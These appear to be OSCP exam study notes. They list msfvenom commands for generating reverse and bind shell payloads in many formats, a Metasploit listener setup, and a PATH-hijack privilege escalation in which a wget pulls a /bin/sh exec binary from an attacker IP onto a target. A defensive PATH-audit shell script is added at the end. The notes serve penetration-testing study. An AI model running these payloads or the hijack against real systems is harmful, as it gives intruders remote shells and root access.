OSCP Notes

msfvenom

Show all payloads
msfvenom -l payloads
Show all payload formats
msfvenom -l formats
Generate a payload
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output payload file name>
Common payloads

meterpreter
linux/x86/meterpreter/reverse_tcp     linux x86 reverse shell
linux/x64/meterpreter/reverse_tcp     linux x64 reverse shell
windows/meterpreter/reverse_tcp       windows x86 reverse shell
windows/x64/meterpreter/reverse_tcp   windows x64 reverse shell

Staged
linux/x86/shell/bind_tcp              linux x86 bind shell
linux/x86/shell/reverse_tcp           linux x86 reverse shell
windows/shell/bind_tcp                windows x86 bind shell
windows/shell/reverse_tcp             windows x86 reverse shell

Nonstaged
linux/x86/shell_bind_tcp              linux x86 bind shell
linux/x86/shell_reverse_tcp           linux x86 reverse shell
windows/shell_bind_tcp                windows x86 bind shell
windows/shell_reverse_tcp             windows x86 reverse shell

MSFVENOM PAYLOAD

Linux

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Windows

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

PHP

msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
Then we need to prepend <?php to the first line of the file so that it executes as a PHP page (the command below uses the macOS clipboard tools pbcopy/pbpaste):
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Python

msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl

Listener

Metasploit
use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z
PATH hijack with an exec payload
This creates a fake scp binary that just runs /bin/sh, for a target program that calls scp by bare name instead of by absolute path:
msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp
wget 192.168.1.23/scp -O /tmp/scp   # transfer the exec binary over to Sufferance
chmod 755 /tmp/scp
export PATH=/tmp:$PATH   # puts /tmp first in PATH
/usr/local/bin/   # the program here will now call our "special" scp binary in /tmp instead
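The export PATH=/tmp:$PATH step above works because a program that runs scp by bare name takes the first match in PATH. The POSIX sh snippet below is an added example and not part of these notes: it resolves a command name against a given PATH string and flags entries that an unprivileged user could plant a binary in (world-writable, missing, or relative), which is the check to run on the environment of any SUID or sudo-invoked program when hardening a host. It assumes only sh, ls, cut and mktemp; the scratch PATH it builds is constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original OSCP notes): audit a PATH string for
# the weakness the /tmp-first PATH trick relies on. Assumes POSIX sh, ls, cut,
# mktemp. The directories and scripts used below are constructed for the demo.

# Print the file a bare command name resolves to under PATH string $2,
# i.e. what a caller of 'scp' actually executes. Exit 1 if nothing matches.
resolve_cmd() (
    _name="$1"
    IFS=':'                      # split on ':' (subshell body, so IFS does not leak)
    for dir in $2; do
        IFS=' '
        _cand="${dir:-.}/$_name" # an empty entry means the current directory
        if [ -x "$_cand" ] && [ ! -d "$_cand" ]; then
            printf '%s\n' "$_cand"
            exit 0               # first hit wins, exactly like the shell's lookup
        fi
    done
    exit 1
)

# Print each hijack-prone PATH entry, one per line, tagged with the reason.
path_hijack_risks() (
    IFS=':'
    for dir in $1; do
        IFS=' '
        case "$dir" in
            /*)
                if [ ! -d "$dir" ]; then
                    printf 'MISSING %s\n' "$dir"      # could be created if the parent is writable
                elif [ "$(ls -ld "$dir" | cut -c9)" = w ]; then
                    # others-write bit set (e.g. /tmp). The sticky bit does not help:
                    # it only stops deleting files, not creating a new 'scp'.
                    printf 'WRITABLE %s\n' "$dir"
                fi ;;
            *)  printf 'RELATIVE %s\n' "${dir:-.}" ;;  # resolved from the caller's cwd
        esac
    done
)

# Build a constructed PATH in a scratch directory and show both checks.
demo_path_audit() {
    t=$(mktemp -d)
    mkdir -p "$t/tmp" "$t/bin"
    chmod 1777 "$t/tmp"; chmod 755 "$t/bin"
    printf '#!/bin/sh\necho real scp\n' > "$t/bin/scp"; chmod 755 "$t/bin/scp"
    printf '#!/bin/sh\necho planted scp\n' > "$t/tmp/scp"; chmod 755 "$t/tmp/scp"
    echo "PATH=$t/bin            -> $(resolve_cmd scp "$t/bin")"
    echo "PATH=$t/tmp:$t/bin     -> $(resolve_cmd scp "$t/tmp:$t/bin")"
    echo "risky entries in $t/tmp:$t/bin:$t/missing:bin"
    path_hijack_risks "$t/tmp:$t/bin:$t/missing:bin"
    rm -rf "$t"
}

demo_path_audit
```

Run the audit with the PATH a privileged program actually inherits (for example the one set by sudo's secure_path or the service's unit file), not your interactive shell's; any WRITABLE or RELATIVE line ahead of the system directories means a bare scp (or any other bare command) can be replaced.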